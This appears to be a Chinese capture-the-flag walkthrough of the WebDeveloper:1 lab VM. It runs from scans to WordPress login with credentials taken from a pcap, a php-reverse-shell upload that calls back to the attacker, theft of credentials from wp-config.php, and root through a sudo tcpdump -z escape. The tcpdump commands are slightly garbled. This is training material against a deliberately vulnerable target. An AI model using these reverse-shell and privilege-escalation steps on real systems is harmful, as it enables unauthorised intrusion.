WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh webdeveloper@192.168.153.158

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
mmoyula1 小时前
【RK3568 PWM 子系统(SG90)驱动开发详解】
android·linux·驱动开发
guts°1 小时前
17-VRRP
网络·智能路由器
Jewel Q1 小时前
动态路由协议基础
网络·智能路由器
宇称不守恒4.02 小时前
2025暑期—06神经网络-常见网络2
网络·人工智能·神经网络
Dreams_l2 小时前
网络编程2(应用层协议,传输层协议)
运维·服务器·网络
数据与人工智能律师2 小时前
数字迷雾中的安全锚点:解码匿名化与假名化的法律边界与商业价值
大数据·网络·人工智能·云计算·区块链
先知后行。3 小时前
网络协议HTTP、TCP(草稿)
网络·网络协议
xzkyd outpaper3 小时前
QUIC协议如何在UDP基础上解决网络切换问题
网络·计算机网络·udp·quic
碳酸的唐3 小时前
Inception网络架构:深度学习视觉模型的里程碑
网络·深度学习·架构
你过来啊你4 小时前
Android用户鉴权实现方案深度分析
android·鉴权